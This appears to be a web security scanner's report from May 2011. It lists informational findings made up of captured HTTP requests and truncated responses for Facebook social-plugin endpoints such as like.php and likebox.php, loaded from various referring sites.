GET /connect/xd_proxy.php Host: static.ak.fbcdn.net Proxy-Connection: keep-alive Referer: http://www.facebook.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-FB-Server: 10.138.16.182 Content-Length: 3017 Vary: Accept-Encoding Cache-Control: public, max-age=297 Expires: Sun, 15 May 2011 20:32:06 GMT Date: Sun, 15 May 2011 20:27:09 GMT Connection: close <!doctype html> <html> <head> <title>XD Proxy</title> </head> <body onload="doFragmentSend()" <div id="swf_holder" style="position: absolute; top: -10000px; width: 1px; heig ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://static.ak.fbcdn |
Path: | /connect/xd_proxy.php |
GET /connect/xd_proxy.php Host: static.ak.fbcdn.net Proxy-Connection: keep-alive Referer: http://www.facebook.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-FB-Server: 10.30.146.199 X-Cnection: close Content-Length: 3017 Vary: Accept-Encoding Cache-Control: public, max-age=595 Expires: Mon, 16 May 2011 01:30:09 GMT Date: Mon, 16 May 2011 01:20:14 GMT Connection: close <!doctype html> <html> <head> <title>XD Proxy</title> </head> <body onload="doFragmentSend()" <div id="swf_holder" style="position: absolute; top: -10000px; width: 1px; heig ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /extern/login_status.php |
GET /extern/login_status.php Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.siteadvisor User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.47.42 X-Cnection: close Date: Mon, 16 May 2011 01:40:24 GMT Content-Length: 58 Given URL is not allowed by the Application configuration. |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.136.9.116 X-Cnection: close Date: Mon, 16 May 2011 01:19:48 GMT Elapsed: 0.034 Content-Length: 7856 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.40.106 X-Cnection: close Date: Mon, 16 May 2011 01:27:29 GMT Content-Length: 11012 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.restorati User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.229.62 X-Cnection: close Date: Mon, 16 May 2011 01:39:45 GMT Content-Length: 6352 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.47.59 X-Cnection: close Date: Mon, 16 May 2011 01:40:46 GMT Content-Length: 6429 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.255.49 X-Cnection: close Date: Mon, 16 May 2011 01:40:45 GMT Content-Length: 6431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.88.23 X-Cnection: close Date: Sun, 15 May 2011 20:27:07 GMT Content-Length: 9269 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.136.42.107 X-Cnection: close Date: Mon, 16 May 2011 01:19:53 GMT Elapsed: 0.037 Content-Length: 6676 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.221.39 X-Cnection: close Date: Mon, 16 May 2011 01:40:45 GMT Content-Length: 6429 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.29.50 X-Cnection: close Date: Sun, 15 May 2011 20:27:07 GMT Content-Length: 8508 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.225.54 X-Cnection: close Date: Mon, 16 May 2011 01:40:46 GMT Content-Length: 6431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.252.43 X-Cnection: close Date: Mon, 16 May 2011 01:40:48 GMT Content-Length: 6431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.22.50 X-Cnection: close Date: Sun, 15 May 2011 20:27:07 GMT Content-Length: 9344 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.54.41 X-Cnection: close Date: Sun, 15 May 2011 20:27:07 GMT Content-Length: 8541 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.79.41 X-Cnection: close Date: Sun, 15 May 2011 20:27:07 GMT Content-Length: 9302 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.110.30 X-Cnection: close Date: Mon, 16 May 2011 01:27:29 GMT Content-Length: 9723 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.49.39 X-Cnection: close Date: Sun, 15 May 2011 20:30:00 GMT Content-Length: 9565 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.24.45 X-Cnection: close Date: Sun, 15 May 2011 20:27:08 GMT Content-Length: 9358 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.231.44 X-Cnection: close Date: Mon, 16 May 2011 01:40:46 GMT Content-Length: 6431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.247.57 X-Cnection: close Date: Mon, 16 May 2011 01:40:45 GMT Content-Length: 6431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.214.48 X-Cnection: close Date: Mon, 16 May 2011 01:40:45 GMT Content-Length: 6431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.136.1.114 X-Cnection: close Date: Mon, 16 May 2011 01:20:12 GMT Elapsed: 0.040 Content-Length: 10701 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.230.52 X-Cnection: close Date: Mon, 16 May 2011 01:40:45 GMT Content-Length: 6431 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?href Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.toshibadirect User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.55.9.64 X-Cnection: close Date: Mon, 16 May 2011 01:40:46 GMT Content-Length: 6429 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.19.25 X-Cnection: close Date: Sun, 15 May 2011 20:27:07 GMT Content-Length: 9409 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.99.35 X-Cnection: close Date: Sun, 15 May 2011 20:27:07 GMT Content-Length: 9646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | /plugins/likebox.php |
GET /plugins/likebox.php?id Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://www.cruisecritic User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.68.45 X-Cnection: close Date: Mon, 16 May 2011 01:28:09 GMT Content-Length: 8915 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.google.com |
Path: | /sdch/vD843DpA.dct |
GET /sdch/vD843DpA.dct HTTP/1.1 Host: www.google.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PREF=ID=381be2a5a4e321de If-Modified-Since: Sun, 15 May 2011 03:44:29 GMT |
